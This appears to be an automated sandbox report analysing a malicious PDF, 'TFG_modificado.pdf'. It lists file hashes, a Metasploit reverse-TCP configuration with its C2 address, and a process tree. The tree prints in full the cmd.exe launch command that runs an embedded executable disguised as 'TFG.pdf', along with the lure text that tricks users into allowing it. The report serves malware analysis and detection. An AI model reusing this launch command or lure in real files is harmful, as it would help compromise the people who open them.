Resubmissions

22-05-2022 17:58

220522-wj59zaebak 10

22-05-2022 16:50

220522-vb7x6aaff6 10

Analysis

  • max time kernel
    145s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    22-05-2022 16:50

General

  • Target

    TFG_modificado.pdf

  • Size

    105KB

  • MD5

    3f40220500ee4514ca088297e70613ed

  • SHA1

    07e9ed05f62671596688c37eaffca357b25969ea

  • SHA256

    53b43327329e3199b64f29d34de75c2d345e43fc7b42e4b74ecceec81575b205

  • SHA512

    c4988c1ee38d3ceb22c616d6c943b79148721590a8efe38172098eac9b5259fb6e700ced4ae967ec6816cea1159c29dd327c2cf44e78a90b5919d5888e9108c2

Malware Config

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

10.0.2.15:4444

Signatures

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies registry class 31 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\TFG_modificado.pdf"
    • Modifies registry class
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1688
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "Desktop\TFG.pdf" (cd "Desktop"))&(if exist "My Documents\TFG.pdf" (cd "My Documents"))&(if exist "Documents\TFG.pdf" (cd "Documents"))&(if exist "Escritorio\TFG.pdf" (cd "Escritorio"))&(if exist "Mis Documentos\TFG.pdf" (cd "Mis Documentos"))&(start TFG.pdf) To view the encrypted content please tick the "Do not show this message again" box and press Open.
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1244
      • \??\c:\Users\Admin\Documents\TFG.pdf
        TFG.pdf
        • Executes dropped EXE
        PID:1860

Network

MITRE ATT&CK Matrix


Downloads

  • C:\Users\Admin\Documents\TFG.pdf
    Filesize

    72KB

    MD5

    c8eda58fbac22e5b0d33f547c858b9f1

    SHA1

    143df53b62f5b2eb2bb2cd2bd70c7882c1c3df2d

    SHA256

    178d1de119f2315d86e78d16e81d34544fbccae169b1d30db4db1be5e82a4574

    SHA512

    6de0398890ed6cbd05459b7308d9e7265f53bc42f4ea7472be0a7ea0e846224c3a3cfcd7387b06ebe7630d52c7bf211e5dd9409d13f0c535781d1654c1c0c72d

  • \??\c:\Users\Admin\Documents\TFG.pdf
    Filesize

    72KB

    MD5

    c8eda58fbac22e5b0d33f547c858b9f1

    SHA1

    143df53b62f5b2eb2bb2cd2bd70c7882c1c3df2d

    SHA256

    178d1de119f2315d86e78d16e81d34544fbccae169b1d30db4db1be5e82a4574

    SHA512

    6de0398890ed6cbd05459b7308d9e7265f53bc42f4ea7472be0a7ea0e846224c3a3cfcd7387b06ebe7630d52c7bf211e5dd9409d13f0c535781d1654c1c0c72d

  • \Users\Admin\Documents\TFG.pdf
    Filesize

    72KB

    MD5

    c8eda58fbac22e5b0d33f547c858b9f1

    SHA1

    143df53b62f5b2eb2bb2cd2bd70c7882c1c3df2d

    SHA256

    178d1de119f2315d86e78d16e81d34544fbccae169b1d30db4db1be5e82a4574

    SHA512

    6de0398890ed6cbd05459b7308d9e7265f53bc42f4ea7472be0a7ea0e846224c3a3cfcd7387b06ebe7630d52c7bf211e5dd9409d13f0c535781d1654c1c0c72d

  • memory/1244-55-0x0000000000000000-mapping.dmp
  • memory/1688-54-0x0000000076391000-0x0000000076393000-memory.dmp
    Filesize

    8KB

  • memory/1860-59-0x0000000000000000-mapping.dmp